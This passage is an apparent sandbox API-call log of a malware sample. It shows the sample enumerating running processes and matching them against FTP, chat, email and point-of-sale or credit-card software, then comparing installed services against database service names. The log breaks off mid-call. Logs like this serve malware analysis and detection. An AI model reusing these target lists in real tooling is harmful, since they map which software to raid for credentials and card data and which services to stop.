lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0169.895] lstrlenW (lpString="icq.exe") returned 7 [0169.895] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0169.896] lstrlenW (lpString="leechftp.exe") returned 12 [0169.896] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0169.897] lstrlenW (lpString="ncftp.exe") returned 9 [0169.897] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0169.898] lstrlenW (lpString="notepad.exe") returned 11 [0169.898] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0169.899] lstrlenW (lpString="operamail.exe") returned 13 [0169.900] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0170.251] lstrlenW (lpString="pidgin.exe") returned 10 [0170.251] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0170.252] lstrlenW (lpString="scriptftp.exe") returned 13 [0170.252] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0170.252] lstrlenW (lpString="skype.exe") returned 9 [0170.253] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0170.253] lstrlenW (lpString="smartftp.exe") returned 12 [0170.253] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0170.254] lstrlenW (lpString="thunderbird.exe") returned 15 [0170.254] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0170.255] lstrlenW (lpString="totalcmd.exe") returned 12 [0170.255] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0170.256] lstrlenW (lpString="trillian.exe") returned 12 [0170.256] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0170.257] lstrlenW (lpString="webdrive.exe") returned 12 [0170.257] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0170.257] lstrlenW (lpString="whatsapp.exe") returned 12 [0170.257] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0170.258] lstrlenW (lpString="winscp.exe") returned 10 [0170.258] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0170.259] lstrlenW (lpString="yahoomessenger.exe") returned 18 [0170.259] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0170.260] lstrlenW (lpString="active-charge.exe") returned 17 [0170.260] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0170.261] lstrlenW (lpString="accupos.exe") returned 11 [0170.261] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0170.262] lstrlenW (lpString="afr38.exe") returned 9 [0170.262] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0170.262] lstrlenW (lpString="aldelo.exe") returned 10 [0170.262] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0170.263] lstrlenW (lpString="ccv_server.exe") returned 14 [0170.263] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0170.264] lstrlenW (lpString="centralcreditcard.exe") returned 21 [0170.264] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xee8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0170.268] lstrlenW (lpString="creditservice.exe") returned 17 [0170.268] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0170.268] lstrlenW (lpString="edcsvr.exe") returned 10 [0170.268] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0170.271] lstrlenW (lpString="fpos.exe") returned 8 [0170.271] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0170.271] lstrlenW (lpString="isspos.exe") returned 10 [0170.271] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0170.272] lstrlenW (lpString="mxslipstream.exe") returned 16 [0170.272] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1010, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0170.273] lstrlenW (lpString="omnipos.exe") returned 11 [0170.273] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1024, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0170.274] lstrlenW (lpString="spcwin.exe") returned 10 [0170.274] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0170.275] lstrlenW (lpString="spgagentservice.exe") returned 19 [0170.275] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0170.276] lstrlenW (lpString="utg2.exe") returned 8 [0170.276] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1060, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_community.exe")) returned 1 [0170.276] lstrlenW (lpString="lb_community.exe") returned 16 [0170.277] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="miniature.exe")) returned 1 [0170.277] lstrlenW (lpString="miniature.exe") returned 13 [0170.277] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="humanity-volumes-enables.exe")) returned 1 [0170.278] lstrlenW (lpString="humanity-volumes-enables.exe") returned 28 [0170.278] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operation-environments.exe")) returned 1 [0170.279] lstrlenW (lpString="operation-environments.exe") returned 26 [0170.279] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0170.279] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0170.279] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0170.281] lstrlenW (lpString="taskhostw.exe") returned 13 [0170.281] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0170.281] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0170.281] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0170.282] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0170.282] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x12b0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0170.283] lstrlenW (lpString="conhost.exe") returned 11 [0170.283] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0170.283] lstrlenW (lpString="sppsvc.exe") returned 10 [0170.284] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0170.284] lstrlenW (lpString="dllhost.exe") returned 11 [0170.284] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0170.285] lstrlenW (lpString="wdgmug.exe") returned 10 [0170.285] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1160, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1260, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0170.286] lstrlenW (lpString="cmd.exe") returned 7 [0170.286] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1160, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0170.286] lstrlenW (lpString="conhost.exe") returned 11 [0170.286] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x764, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0170.287] lstrlenW (lpString="sc.exe") returned 6 [0170.287] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x764, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0170.287] lstrlenW (lpString="conhost.exe") returned 11 [0170.287] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0170.288] lstrlenW (lpString="WMIADAP.exe") returned 11 [0170.288] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0170.288] CloseHandle (hObject=0x30c) returned 1 [0170.288] Sleep (dwMilliseconds=0x1f4) [0171.080] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x74ee80 [0171.081] EnumServicesStatusExW (in: hSCManager=0x74ee80, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0) returned 0 [0171.081] GetLastError () returned 0xea [0171.081] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x1dfc) returned 0x3ee5878 [0171.081] EnumServicesStatusExW (in: hSCManager=0x74ee80, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3ee5878, cbBufSize=0x1dfc, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3ee5878, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0) returned 1 [0171.082] CloseServiceHandle (hSCObject=0x74ee80) returned 1 [0171.082] lstrlenW (lpString="Appinfo") returned 7 [0171.082] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0171.082] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0171.082] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0171.082] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0171.082] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0171.082] lstrlenW (lpString="AppXSvc") returned 7 [0171.083] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0171.083] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0171.083] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0171.083] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0171.083] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0171.083] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0171.083] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0171.083] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0171.083] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0171.083] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0171.083] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0171.083] lstrlenW (lpString="Audiosrv") returned 8 [0171.083] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0171.083] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0171.083] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0171.083] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0171.083] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0171.083] lstrlenW (lpString="BFE") returned 3 [0171.083] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0171.083] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0171.083] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0171.083] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0171.083] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0171.083] lstrlenW (lpString="BITS") returned 4 [0171.083] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0171.083] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0171.083] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0171.083] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0171.083] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0171.083] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0171.083] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0171.083] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0171.083] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0171.083] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0171.084] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0171.084] lstrlenW (lpString="CDPSvc") returned 6 [0171.084] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0171.084] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0171.084] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0171.084] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0171.084] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0171.084] lstrlenW (lpString="ClickToRunSvc") returned 13 [0171.084] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0171.084] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0171.084] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0171.084] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0171.084] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0171.084] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0171.084] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0171.084] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0171.084] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0171.084] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0171.084] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0171.084] lstrlenW (lpString="CryptSvc") returned 8 [0171.084] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0171.084] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0171.084] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0171.084] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0171.084] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0171.084] lstrlenW (lpString="DcomLaunch") returned 10 [0171.084] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0171.084] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0171.084] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0171.084] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0171.084] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0171.084] lstrlenW (lpString="Dhcp") returned 4 [0171.084] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0171.084] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0171.085] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0171.085] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0171.085] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0171.085] lstrlenW (lpString="Dnscache") returned 8 [0171.085] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0171.085] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0171.085] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0171.085] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0171.085] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0171.085] lstrlenW (lpString="DoSvc") returned 5 [0171.085] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0171.085] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0171.085] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0171.085] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0171.085] lstrcmpiW (lpString1="sqlserveradhelper", 